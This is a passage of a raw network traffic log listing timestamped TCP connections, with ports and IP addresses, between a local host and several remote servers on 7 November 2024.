Nov 7, 2024 07:33:17.295216084 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:17.298458099 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.298465014 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.299001932 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.299005985 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.373677969 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.373694897 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.373867035 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.380521059 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.380532026 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.397828102 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.403093100 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.403105021 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.403512955 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.403517008 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.423455000 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.423530102 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.423600912 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.460143089 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.460155010 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.460197926 CET	49837	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.460202932 CET	443	49837	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.502811909 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.502823114 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.502942085 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.530963898 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.530986071 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.531016111 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.531043053 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.531081915 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.552546024 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.552557945 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.564476967 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.564488888 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.564502954 CET	49833	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:17.564507961 CET	443	49833	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.828371048 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:17.938357115 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.023025036 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.053564072 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.089982986 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.090003967 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.090060949 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.092541933 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.092556000 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.092988968 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.092993021 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.095123053 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.095129013 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.095556974 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.095561981 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.095698118 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.095707893 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.116764069 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.117325068 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.117347002 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.123421907 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.123428106 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.135143042 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.138504982 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.138513088 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.139502048 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.139569044 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.146095991 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.146270990 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.148417950 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.148452997 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.218357086 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.218400955 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.218456030 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.221087933 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.221152067 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.221205950 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.249984980 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.250030994 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.250066996 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.250099897 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.250133038 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.260988951 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.261003017 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.261012077 CET	49838	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.261018038 CET	443	49838	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.262845993 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.262854099 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.262880087 CET	49839	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.262885094 CET	443	49839	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.266315937 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.266324043 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.266335964 CET	49842	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.266340017 CET	443	49842	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.285545111 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.285562038 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.285687923 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.298557997 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.298568964 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.300674915 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.300693989 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.302949905 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.310898066 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.310908079 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.314080954 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.314115047 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.314171076 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.314338923 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.314362049 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.324182987 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:18.324425936 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:18.326339960 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.326406002 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.329019070 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.329216003 CET	80	49850	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:18.329303980 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:18.329381943 CET	80	49832	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:18.329432964 CET	49832	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:18.334419012 CET	49840	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.334425926 CET	443	49840	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.337054014 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.337085962 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.337146997 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.337706089 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.337718964 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.341859102 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.341872931 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.342291117 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.342294931 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.342432022 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:18.347299099 CET	80	49850	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:18.348603964 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:18.348613977 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:18.348665953 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:18.348874092 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:18.348890066 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:18.470916033 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.470988989 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.471045971 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.475239038 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.475250959 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.475263119 CET	49845	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.475266933 CET	443	49845	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.482341051 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.482369900 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.482434988 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.498531103 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.498543978 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.703697920 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.703728914 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.703821898 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.704282045 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:18.704294920 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:18.833965063 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.864029884 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.864051104 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:18.864694118 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:18.864698887 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.027070045 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.043823957 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.070251942 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.080199003 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.080219030 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.080688000 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.080693007 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.082236052 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.082253933 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.092989922 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.092997074 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.113837004 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.113852024 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.114382982 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.114387035 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.179260015 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.179311037 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.179388046 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.193188906 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.195322037 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.195332050 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.195343018 CET	49846	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.195348024 CET	443	49846	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.200433969 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.201519012 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.201529026 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.201704025 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.201713085 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.202152014 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.202727079 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.202796936 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.205827951 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.211100101 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.211275101 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.212095976 CET	49847	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.212105036 CET	443	49847	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.212378025 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.212511063 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.214293957 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.214379072 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.214548111 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.214596987 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.214610100 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.217262983 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.217303038 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.217386961 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.220259905 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.220328093 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.220438004 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.224735975 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.224751949 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.224905014 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.229696989 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.231921911 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.231936932 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.244823933 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.244848013 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.244874001 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.244910002 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.244946957 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.250509977 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.250519037 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.250530005 CET	49848	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.250535011 CET	443	49848	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.254065990 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.254065990 CET	49849	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.254086018 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.254096031 CET	443	49849	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.254194975 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.254209042 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.255232096 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.255244017 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.255357981 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.255676985 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.255681038 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.271697044 CET	80	49850	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:19.271763086 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:19.324285984 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.367531061 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.367549896 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.367623091 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.378432989 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.378478050 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.378563881 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.380934000 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.380965948 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.381028891 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.381036043 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.381073952 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.391329050 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.391339064 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.423996925 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.424027920 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.424041986 CET	49853	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.424047947 CET	443	49853	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.458348989 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.458379984 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.458452940 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.487901926 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.487926006 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.491122961 CET	49851	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.491133928 CET	443	49851	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.497406960 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.497416019 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.497473001 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.497673988 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.497684002 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.527594090 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.535357952 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535417080 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535515070 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535557985 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.535567045 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535653114 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.535696983 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535741091 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.535815954 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.535857916 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.543504000 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.543556929 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.543564081 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.545331955 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.545345068 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.545749903 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.546673059 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.546741009 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.547213078 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.591329098 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.627644062 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.641623020 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.641633987 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.641803980 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.642087936 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.642096043 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.652067900 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.652234077 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.652278900 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.652291059 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.654299021 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.654319048 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.654388905 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.654603004 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.654617071 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.655148983 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.655193090 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.655200005 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.659499884 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.659547091 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.659554005 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.668251991 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.668296099 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.668302059 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.678293943 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.678415060 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.678421974 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.685731888 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.685769081 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.685782909 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.694591999 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.694641113 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.694654942 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.702848911 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.702919006 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.702925920 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.704081059 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.704168081 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.704225063 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.710788012 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.710916996 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.710925102 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769243956 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769278049 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769305944 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.769315958 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769381046 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.769431114 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769676924 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.769723892 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.769731998 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.772105932 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.772156954 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.772162914 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.772208929 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.772407055 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.772413969 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.776859999 CET	443	49852	142.250.185.132	192.168.2.4
